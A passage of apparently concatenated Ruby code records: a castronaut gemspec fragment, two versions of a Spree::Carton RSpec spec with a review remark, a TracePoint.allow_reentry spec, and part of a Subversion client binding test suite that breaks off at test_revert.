"vendor/sinatra/compat/sass_test.rb",
"vendor/sinatra/compat/sessions_test.rb",
"vendor/sinatra/compat/streaming_test.rb",
"vendor/sinatra/compat/sym_params_test.rb",
"vendor/sinatra/compat/template_test.rb",
"vendor/sinatra/compat/use_in_file_templates_test.rb",
"vendor/sinatra/compat/views/foo.builder",
"vendor/sinatra/compat/views/foo.erb",
"vendor/sinatra/compat/views/foo.haml",
"vendor/sinatra/compat/views/foo.sass",
"vendor/sinatra/compat/views/foo_layout.erb",
"vendor/sinatra/compat/views/foo_layout.haml",
"vendor/sinatra/compat/views/layout_test/foo.builder",
"vendor/sinatra/compat/views/layout_test/foo.erb",
"vendor/sinatra/compat/views/layout_test/foo.haml",
"vendor/sinatra/compat/views/layout_test/foo.sass",
"vendor/sinatra/compat/views/layout_test/layout.builder",
"vendor/sinatra/compat/views/layout_test/layout.erb",
"vendor/sinatra/compat/views/layout_test/layout.haml",
"vendor/sinatra/compat/views/layout_test/layout.sass",
"vendor/sinatra/compat/views/no_layout/no_layout.builder",
"vendor/sinatra/compat/views/no_layout/no_layout.haml",
"vendor/sinatra/lib/sinatra.rb",
"vendor/sinatra/lib/sinatra/base.rb",
"vendor/sinatra/lib/sinatra/compat.rb",
"vendor/sinatra/lib/sinatra/images/404.png",
"vendor/sinatra/lib/sinatra/images/500.png",
"vendor/sinatra/lib/sinatra/main.rb",
"vendor/sinatra/lib/sinatra/test.rb",
"vendor/sinatra/lib/sinatra/test/bacon.rb",
"vendor/sinatra/lib/sinatra/test/rspec.rb",
"vendor/sinatra/lib/sinatra/test/spec.rb",
"vendor/sinatra/lib/sinatra/test/unit.rb",
"vendor/sinatra/sinatra.gemspec",
"vendor/sinatra/test/base_test.rb",
"vendor/sinatra/test/builder_test.rb",
"vendor/sinatra/test/data/reload_app_file.rb",
"vendor/sinatra/test/erb_test.rb",
"vendor/sinatra/test/filter_test.rb",
"vendor/sinatra/test/haml_test.rb",
"vendor/sinatra/test/helper.rb",
"vendor/sinatra/test/helpers_test.rb",
"vendor/sinatra/test/mapped_error_test.rb",
"vendor/sinatra/test/middleware_test.rb",
"vendor/sinatra/test/options_test.rb",
"vendor/sinatra/test/reload_test.rb",
"vendor/sinatra/test/request_test.rb",
"vendor/sinatra/test/result_test.rb",
"vendor/sinatra/test/routing_test.rb",
"vendor/sinatra/test/sass_test.rb",
"vendor/sinatra/test/sinatra_test.rb",
"vendor/sinatra/test/static_test.rb",
"vendor/sinatra/test/templates_test.rb",
"vendor/sinatra/test/views/hello.builder",
"vendor/sinatra/test/views/hello.erb",
"vendor/sinatra/test/views/hello.haml",
"vendor/sinatra/test/views/hello.sass",
"vendor/sinatra/test/views/hello.test",
"vendor/sinatra/test/views/layout2.builder",
"vendor/sinatra/test/views/layout2.erb",
"vendor/sinatra/test/views/layout2.haml",
"vendor/sinatra/test/views/layout2.test"
]
s.homepage = %q{http://github.com/relevance/castronaut}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.2}
s.summary = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.test_files = [
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb"
]
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::RubyGemsVersion) >= Gem::Version.new('1.2.0') then
else
end
else
end
end
|
require 'spec_helper'

# Specs for Spree::Carton: creation, tracking-URL generation, param aliasing,
# and the helpers that project a carton onto its orders/shipments/manifest.
describe Spree::Carton do
  let(:carton) { create(:carton) }

  describe "#create" do
    subject { carton }

    it "raises no errors" do
      subject
    end
  end

  describe "#tracking_url" do
    subject do
      carton.tracking_url
    end

    let(:carton) { create(:carton, shipping_method: shipping_method) }
    let(:shipping_method) do
      create(:shipping_method, tracking_url: "https://example.com/:tracking")
    end

    context "when tracking is not present" do
      it { is_expected.to be_nil }
    end

    context "when tracking is present" do
      let(:carton) do
        create(:carton, shipping_method: shipping_method, tracking: "1Z12345")
      end

      it "uses shipping method to determine url" do
        is_expected.to eq("https://example.com/1Z12345")
      end
    end
  end

  describe "#to_param" do
    subject do
      carton.to_param
    end

    it { is_expected.to eq carton.number }
  end

  describe "#order_numbers" do
    subject { carton.order_numbers }
    let(:order) { carton.orders.first }

    it "returns a list of the order numbers it is associated to" do
      expect(subject).to eq [order.number]
    end
  end

  describe "#shipment_numbers" do
    subject { carton.shipment_numbers }
    let(:shipment) { carton.shipments.first }

    # FIX: the example asserts shipment numbers, but the description
    # previously said "order numbers" (copy/paste from the block above).
    it "returns a list of the shipment numbers it is associated to" do
      expect(subject).to eq [shipment.number]
    end
  end

  describe "#order_emails" do
    subject { carton.order_emails }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:email) { 'something@something.com' }

    before do
      first_order.update_attributes!(email: email)
      second_order.update_attributes!(email: email)
    end

    # Both orders share one email, so the list is de-duplicated.
    it "returns a unique list of the order emails it is associated to" do
      expect(subject).to eq [email]
    end
  end

  describe "#manifest" do
    subject { carton.manifest }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:first_line_item) { first_order.line_items.first }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_line_item) { second_order.line_items.first }

    it "contains only the items in both the carton and order" do
      expect(subject.map(&:line_item)).to match_array([first_line_item, second_line_item])
    end
  end

  describe "#manifest_for_order" do
    subject { carton.manifest_for_order(first_order) }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:first_line_item) { first_order.line_items.first }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }

    it "contains only the items in both the carton and order" do
      expect(subject.map(&:line_item)).to eq [first_line_item]
    end
  end

  describe "#any_exchanges?" do
    subject { carton.any_exchanges? }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }

    context "when any of the inventory has an original return item" do
      let(:return_item) { create(:return_item) }

      before do
        first_order.inventory_units.first.original_return_item = return_item
        first_order.save
      end

      it "is true" do
        expect(subject).to be_truthy
      end
    end

    context "when none of the inventory has an original return item" do
      it "is false" do
        expect(subject).to be_falsey
      end
    end
  end
end
This is testing the shipment numbers here, not the order numbers.
require 'spec_helper'

# Specs for Spree::Carton. Covers creation, tracking-URL generation,
# #to_param, and the helpers that project a carton onto its associated
# orders, shipments, and manifest entries.
describe Spree::Carton do
  let(:carton) { create(:carton) }

  describe "#create" do
    subject { carton }

    it "raises no errors" do
      subject
    end
  end

  describe "#tracking_url" do
    subject do
      carton.tracking_url
    end

    # The shipping method's tracking_url template substitutes :tracking.
    let(:carton) { create(:carton, shipping_method: shipping_method) }
    let(:shipping_method) do
      create(:shipping_method, tracking_url: "https://example.com/:tracking")
    end

    context "when tracking is not present" do
      it { is_expected.to be_nil }
    end

    context "when tracking is present" do
      # Overrides the outer `carton` let to add a tracking number.
      let(:carton) do
        create(:carton, shipping_method: shipping_method, tracking: "1Z12345")
      end

      it "uses shipping method to determine url" do
        is_expected.to eq("https://example.com/1Z12345")
      end
    end
  end

  describe "#to_param" do
    subject do
      carton.to_param
    end

    it { is_expected.to eq carton.number }
  end

  describe "#order_numbers" do
    subject { carton.order_numbers }
    let(:order) { carton.orders.first }

    it "returns a list of the order numbers it is associated to" do
      expect(subject).to eq [order.number]
    end
  end

  describe "#shipment_numbers" do
    subject { carton.shipment_numbers }
    let(:shipment) { carton.shipments.first }

    it "returns a list of the shipment numbers it is associated to" do
      expect(subject).to eq [shipment.number]
    end
  end

  describe "#order_emails" do
    subject { carton.order_emails }

    # Carton spans inventory units from two orders sharing one email.
    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:email) { 'something@something.com' }

    before do
      first_order.update_attributes!(email: email)
      second_order.update_attributes!(email: email)
    end

    # Duplicate emails collapse to a single entry.
    it "returns a unique list of the order emails it is associated to" do
      expect(subject).to eq [email]
    end
  end

  describe "#manifest" do
    subject { carton.manifest }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:first_line_item) { first_order.line_items.first }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_line_item) { second_order.line_items.first }

    it "contains only the items in both the carton and order" do
      expect(subject.map(&:line_item)).to match_array([first_line_item, second_line_item])
    end
  end

  describe "#manifest_for_order" do
    subject { carton.manifest_for_order(first_order) }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:first_line_item) { first_order.line_items.first }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }

    # Only first_order's line items appear when scoping by that order.
    it "contains only the items in both the carton and order" do
      expect(subject.map(&:line_item)).to eq [first_line_item]
    end
  end

  describe "#any_exchanges?" do
    subject { carton.any_exchanges? }

    let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
    let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
    let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }

    context "when any of the inventory has an original return item" do
      let(:return_item) { create(:return_item) }

      before do
        first_order.inventory_units.first.original_return_item = return_item
        first_order.save
      end

      it "is true" do
        expect(subject).to be_truthy
      end
    end

    context "when none of the inventory has an original return item" do
      it "is false" do
        expect(subject).to be_falsey
      end
    end
  end
end
|
Add spec for TracePoint.allow_reentry - https://bugs.ruby-lang.org/issues/15912
require_relative '../../spec_helper'
require_relative 'fixtures/classes'
# Spec for TracePoint.allow_reentry (Feature #15912, Ruby 3.1+).
# NOTE: the first example is layout-sensitive — it compares tp.lineno against
# `__LINE__ + 2 .. __LINE__ + 4`, so the relative positions of the `next if`
# line and the three lines of the allow_reentry block must not change.
ruby_version_is "3.1" do
  describe 'TracePoint.allow_reentry' do
    it 'allows the reentrance in a given block' do
      event_lines = []
      l1 = l2 = l3 = l4 = nil
      TracePoint.new(:line) do |tp|
        next unless TracePointSpec.target_thread?
        event_lines << tp.lineno
        next if (__LINE__ + 2 .. __LINE__ + 4).cover?(tp.lineno) # skip events for the reentrant block itself to avoid infinite recursion
        TracePoint.allow_reentry do
          a = 1; l3 = __LINE__
          b = 2; l4 = __LINE__
        end
      end.enable do
        c = 3; l1 = __LINE__
        d = 4; l2 = __LINE__
      end
      # Each traced line in the enable block re-triggers the handler,
      # which (reentrantly) traces l3 and l4 again.
      event_lines.should == [l1, l3, l4, l2, l3, l4]
    end

    # Calling allow_reentry with no TracePoint handler running raises.
    it 'raises RuntimeError' do
      -> {
        TracePoint.allow_reentry{}
      }.should raise_error(RuntimeError)
    end
  end
end
|
require "my-assertions"
require "util"
require "svn/core"
require "svn/client"
class SvnClientTest < Test::Unit::TestCase
include SvnTestUtil
# Per-test fixture: builds a fresh repository + working copy via SvnTestUtil.
# `true` asks setup_basic for its full setup variant (see SvnTestUtil —
# TODO confirm exact meaning of the flag against util.rb).
def setup
  setup_basic(true)
end

# Tears down the repository/working copy created by setup.
def teardown
  teardown_basic
end
# The client library reports the same version as the core subr library.
def test_version
  assert_equal(Svn::Core.subr_version, Svn::Client.version)
end
# Non-recursive add: only the top directory is scheduled, so the nested
# directory never reaches the repository and cat on its URI fails.
def test_add_not_recurse
  log = "sample log"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, dir)
  uri = "#{@repos_uri}/#{dir}/#{dir}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  FileUtils.mkdir(path)
  ctx.add(dir_path, false) # recurse = false
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::FS_NOT_FOUND) do
    ctx.cat(uri)
  end
end
# Recursive add (the default): a file nested inside the added directory is
# committed and readable back via its repository URI.
def test_add_recurse
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path)
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# Re-adding an already-versioned directory raises ENTRY_EXISTS unless the
# force flag is given; with force the nested file gets picked up.
def test_add_force
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path, false) # directory only; file not yet versioned
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::ENTRY_EXISTS) do
    ctx.add(dir_path, true, false) # recurse, but no force
  end
  ctx.add(dir_path, true, true)    # recurse + force succeeds
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# The svn:ignore property suppresses the file from a forced recursive add
# unless the no_ignore flag (4th argument) is true.
def test_add_no_ignore
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  ctx.add(dir_path, false)
  ctx.propset(Svn::Core::PROP_IGNORE, file, dir_path) # ignore the file
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path, true, true, false) # respects svn:ignore
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::FS_NOT_FOUND) do
    ctx.cat(uri)
  end
  ctx.add(dir_path, true, true, true)  # no_ignore: file is added now
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# mkdir on a working-copy path vs. directly on a repository URI:
# - a WC mkdir schedules the directory (re-adding raises EntryExists);
# - a URI mkdir commits immediately and bumps the revision;
# - mkdir of a deep path whose parents don't exist raises.
def test_mkdir
  log = "sample log"
  dir = "dir"
  deep_dir = ["d", "e", "e", "p"]
  dir2 = "dir2"
  dir_uri = "#{@repos_uri}/#{dir}"
  deep_dir_uri = "#{@repos_uri}/#{deep_dir.join('/')}"
  dir2_uri = "#{@repos_uri}/#{dir2}"
  dir_path = File.join(@wc_path, dir)
  deep_dir_path = File.join(@wc_path, *deep_dir)
  dir2_path = File.join(@wc_path, dir2)
  ctx = make_context(log)
  assert(!File.exist?(dir_path))
  ctx.mkdir(dir_path)
  assert(File.exist?(dir_path))
  assert_raises(Svn::Error::EntryExists) do
    ctx.add(dir_path)
  end
  old_rev = ctx.commit(@wc_path).revision
  new_rev = ctx.mkdir(dir2_uri).revision # URI mkdir commits directly
  assert_equal(old_rev + 1, new_rev)
  assert_raises(Svn::Error::FsAlreadyExists) do
    ctx.mkdir(dir2_uri)
  end
  assert(!File.exist?(dir2_path)) # not in the WC until update
  ctx.update(@wc_path)
  assert(File.exist?(dir2_path))
  assert_raises(Svn::Error::SvnError) do
    ctx.mkdir(deep_dir_path) # parents missing; plain mkdir fails
  end
end
# mkdir with an Array of paths creates all of them; the notify callback
# reports each path with add? on mkdir and commit_added? on commit.
def test_mkdir_multiple
  log = "sample log"
  dir = "dir"
  dir2 = "dir2"
  dirs = [dir, dir2]
  dirs_path = dirs.collect{|d| File.join(@wc_path, d)}
  dirs_uri = dirs.collect{|d| "#{@repos_uri}/#{d}"}
  ctx = make_context(log)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  dirs_path.each do |path|
    assert(!File.exist?(path))
  end
  ctx.mkdir(dirs_path) # pass the array itself
  assert_equal(dirs_path.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal(dirs_path.collect{true},
               infos.collect{|path, notify| notify.add?})
  dirs_path.each do |path|
    assert(File.exist?(path))
  end
  infos.clear
  ctx.commit(@wc_path)
  assert_equal(dirs_path.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal(dirs_path.collect{true},
               infos.collect{|path, notify| notify.commit_added?})
end
# Same as test_mkdir_multiple, but passes the paths as splatted arguments
# (ctx.mkdir(*dirs_path)) instead of a single Array — both forms must work.
def test_mkdir_multiple2
  log = "sample log"
  dir = "dir"
  dir2 = "dir2"
  dirs = [dir, dir2]
  dirs_path = dirs.collect{|d| File.join(@wc_path, d)}
  dirs_uri = dirs.collect{|d| "#{@repos_uri}/#{d}"}
  ctx = make_context(log)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  dirs_path.each do |path|
    assert(!File.exist?(path))
  end
  ctx.mkdir(*dirs_path) # splat form
  assert_equal(dirs_path.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal(dirs_path.collect{true},
               infos.collect{|path, notify| notify.add?})
  dirs_path.each do |path|
    assert(File.exist?(path))
  end
  infos.clear
  ctx.commit(@wc_path)
  assert_equal(dirs_path.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal(dirs_path.collect{true},
               infos.collect{|path, notify| notify.commit_added?})
end
# mkdir_p creates missing intermediate directories (like `mkdir -p`):
# both parent and child are created, notified as added, then committed.
def test_mkdir_p
  log = "sample log"
  dir = "parent"
  child_dir = "parent/child"
  dir_path = Pathname(@wc_path) + dir
  child_dir_path = dir_path + "child"
  full_paths = [dir_path, child_dir_path].collect {|path| path.expand_path}
  ctx = make_context(log)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  assert_equal([false, false], [dir_path.exist?, child_dir_path.exist?])
  ctx.mkdir_p(child_dir_path.to_s)
  assert_equal(full_paths.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true, true],
               infos.collect{|path, notify| notify.add?})
  assert_equal([true, true], [dir_path.exist?, child_dir_path.exist?])
  infos.clear
  ctx.commit(@wc_path)
  assert_equal(full_paths.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true, true],
               infos.collect{|path, notify| notify.commit_added?})
end
# delete removes committed files/dirs; deleting a locally-modified file
# raises ClientModified unless force (2nd argument) is true.
def test_delete
  log = "sample log"
  src = "sample source\n"
  file = "file.txt"
  dir = "dir"
  path = File.join(@wc_path, file)
  dir_path = File.join(@wc_path, dir)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.delete([path, dir_path])
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src * 2)} # local modification
  assert_raises(Svn::Error::ClientModified) do
    ctx.delete(path)
  end
  assert_nothing_raised do
    ctx.delete(path, true) # force
    ctx.commit(@wc_path)
  end
  assert(!File.exist?(path))
end
# Exercises the FileUtils-style aliases: rm behaves like delete (raising
# ClientModified on local mods), rm_f forces, and rm_f accepts multiple paths.
def test_delete_alias
  log = "sample log"
  src = "sample source\n"
  file = "file.txt"
  dir = "dir"
  path = File.join(@wc_path, file)
  dir_path = File.join(@wc_path, dir)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.rm([path, dir_path])
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src * 2)} # local modification
  assert_raises(Svn::Error::ClientModified) do
    ctx.rm(path)
  end
  assert_nothing_raised do
    ctx.rm_f(path) # forced delete
    ctx.commit(@wc_path)
  end
  assert(!File.exist?(path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.rm_f(path, dir_path) # splat form: several targets at once
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
end
# import sends an unversioned tree straight into the repository;
# the imported file shows up in the WC after an update.
def test_import
  src = "source\n"
  log = "sample log"
  deep_dir = File.join(%w(a b c d e))
  file = "sample.txt"
  deep_dir_path = File.join(@wc_path, deep_dir)
  path = File.join(deep_dir_path, file)
  tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
  tmp_path = File.join(tmp_deep_dir_path, file)
  ctx = make_context(log)
  FileUtils.mkdir_p(tmp_deep_dir_path)
  File.open(tmp_path, "w") {|f| f.print(src)}
  ctx.import(@tmp_path, @repos_uri)
  ctx.up(@wc_path)
  assert_equal(src, File.open(path){|f| f.read})
end
# import accepting a Hash of custom revision properties: the property is
# readable back via revprop_get on the new revision.
def test_import_custom_revprops
  src = "source\n"
  log = "sample log"
  deep_dir = File.join(%w(a b c d e))
  file = "sample.txt"
  deep_dir_path = File.join(@wc_path, deep_dir)
  path = File.join(deep_dir_path, file)
  tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
  tmp_path = File.join(tmp_deep_dir_path, file)
  ctx = make_context(log)
  FileUtils.mkdir_p(tmp_deep_dir_path)
  File.open(tmp_path, "w") {|f| f.print(src)}
  new_rev = ctx.import(@tmp_path, @repos_uri, true, false,
                       {"custom-prop" => "some-value"}).revision
  assert_equal(["some-value", new_rev],
               ctx.revprop_get("custom-prop", @repos_uri, new_rev))
  ctx.up(@wc_path)
  assert_equal(src, File.open(path){|f| f.read})
end
# commit with nothing to commit yields INVALID_REVNUM; real commits bump the
# revision. A non-recursive commit (2nd arg false) of a nested change is a
# no-op; `ci` is an alias of commit.
def test_commit
  log = "sample log"
  dir1 = "dir1"
  dir2 = "dir2"
  dir1_path = File.join(@wc_path, dir1)
  dir2_path = File.join(dir1_path, dir2)
  ctx = make_context(log)
  assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path).revision)
  ctx.mkdir(dir1_path)
  assert_equal(0, youngest_rev)
  assert_equal(1, ctx.commit(@wc_path).revision)
  ctx.mkdir(dir2_path)
  assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path, false).revision)
  assert_equal(2, ctx.ci(@wc_path).revision)
end
# status: by default reports only interesting (added/modified) entries;
# with get_all/update flags (via the `st` alias) it reports everything;
# svn:ignore hides unversioned entries unless the no_ignore flag is set.
def test_status
  log = "sample log"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path1 = File.join(@wc_path, file1)
  path2 = File.join(dir_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {}
  ctx.add(path1)
  rev1 = ctx.commit(@wc_path).revision
  ctx.mkdir(dir_path)
  File.open(path2, "w") {} # unversioned file
  infos = []
  rev = ctx.status(@wc_path) do |path, status|
    infos << [path, status]
  end
  assert_equal(youngest_rev, rev)
  # Only the scheduled dir and the unversioned file are reported.
  assert_equal([dir_path, path2].sort,
               infos.collect{|path, status| path}.sort)
  dir_status = infos.assoc(dir_path).last
  assert(dir_status.text_added?)
  assert(dir_status.entry.dir?)
  assert(dir_status.entry.add?)
  path2_status = infos.assoc(path2).last
  assert(!path2_status.text_added?)
  assert_nil(path2_status.entry) # unversioned => no entry
  infos = []
  rev = ctx.st(@wc_path, rev1, true, true) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  # get_all: every path, including unchanged ones, is reported.
  assert_equal([@wc_path, dir_path, path1, path2].sort,
               infos.collect{|path, status| path}.sort)
  wc_status = infos.assoc(@wc_path).last
  assert(wc_status.text_normal?)
  assert(wc_status.entry.dir?)
  assert(wc_status.entry.normal?)
  dir_status = infos.assoc(dir_path).last
  assert(dir_status.text_added?)
  assert(dir_status.entry.dir?)
  assert(dir_status.entry.add?)
  path1_status = infos.assoc(path1).last
  assert(path1_status.text_normal?)
  assert(path1_status.entry.file?)
  assert(path1_status.entry.normal?)
  path2_status = infos.assoc(path2).last
  assert(!path2_status.text_added?)
  assert_nil(path2_status.entry)
  ctx.prop_set(Svn::Core::PROP_IGNORE, file2, dir_path) # ignore file2
  infos = []
  rev = ctx.status(@wc_path, nil, true, true, true, false) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  assert_equal([@wc_path, dir_path, path1].sort,
               infos.collect{|path, status| path}.sort)
  infos = []
  rev = ctx.status(@wc_path, nil, true, true, true, true) do |path, status|
    infos << [path, status]
  end
  assert_equal(rev1, rev)
  # no_ignore: the ignored file is reported again.
  assert_equal([@wc_path, dir_path, path1, path2].sort,
               infos.collect{|path, status| path}.sort)
end
# status honors both the legacy recurse booleans and the depth keywords
# ('empty', 'files', 'immediates', 'infinity'), each selecting a different
# subset of the Greek-tree entries under :b.
def test_status_with_depth
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  # make everything out-of-date
  ctx.prop_set('propname', 'propvalue', @greek.path(:b), :infinity)
  # A single file target reports itself regardless of recurse/depth choice.
  recurse_and_depth_choices.each do |rd|
    ctx.status(@greek.path(:mu), nil, rd) do |path, status|
      assert_equal @greek.uri(:mu), status.url
    end
  end
  # Expected reported entries per recurse flag (true/false) or depth keyword.
  expected_statuses_by_depth = {
    true => [:beta, :b, :lambda, :e, :f, :alpha],
    false => [:b, :lambda, :e, :f],
    'empty' => [:b],
    'files' => [:b, :lambda],
    'immediates' => [:b, :lambda, :e, :f],
    'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
  }
  recurse_and_depth_choices.each do |rd|
    urls = []
    ctx.status(@greek.path(:b), nil, rd) do |path, status|
      urls << status.url
    end
    # FIX: failure message previously read "depth '#{rd}" — the closing
    # single quote was missing, producing e.g. `depth 'true` on failure.
    assert_equal(expected_statuses_by_depth[rd].map{|s| @greek.uri(s)}.sort,
                 urls.sort,
                 "depth '#{rd}'")
  end
end
# checkout materializes the repository into a fresh WC; the `co` alias with
# recurse=false (5th argument) leaves nested paths out.
def test_checkout
  log = "sample log"
  file = "hello.txt"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  content = "Hello"
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w"){|f| f.print(content)}
  ctx.add(path)
  ctx.commit(@wc_path)
  FileUtils.rm_rf(@wc_path)
  ctx.checkout(@repos_uri, @wc_path)
  assert(File.exist?(path))
  FileUtils.rm_rf(@wc_path)
  ctx.co(@repos_uri, @wc_path, nil, nil, false) # non-recursive
  assert(!File.exist?(path))
end
# update restores locally removed files to the requested revision, accepts an
# Array of targets (returning an Array of revisions), raises
# FS_NO_SUCH_REVISION for a future revision, and tolerates missing targets.
def test_update
  log = "sample log"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  content = "Hello"
  File.open(path, "w"){|f| f.print(content)}
  ctx = make_context(log)
  assert_nothing_raised do
    ctx.update(File.join(@wc_path, "non-exist"), youngest_rev)
  end
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  FileUtils.rm(path)
  assert(!File.exist?(path))
  assert_equal(commit_info.revision,
               ctx.update(path, commit_info.revision))
  assert_equal(content, File.read(path))
  FileUtils.rm(path)
  assert(!File.exist?(path))
  # Array target => Array of resulting revisions.
  assert_equal([commit_info.revision],
               ctx.update([path], commit_info.revision))
  assert_equal(content, File.read(path))
  assert_raise(Svn::Error::FS_NO_SUCH_REVISION) do
    begin
      ctx.update(path, commit_info.revision + 1)
    ensure
      ctx.cleanup(@wc_path) # release any WC locks left by the failure
    end
  end
  assert_nothing_raised do
    ctx.update(path + "non-exist", commit_info.revision)
  end
end
# revert restores pristine text for a single path, an Array of paths, or a
# whole tree (recursive by default); with recurse=false only the directory
# itself is reverted, leaving modified children untouched.
def test_revert
  log = "sample log"
  file1 = "hello1.txt"
  file2 = "hello2.txt"
  file3 = "hello3.txt"
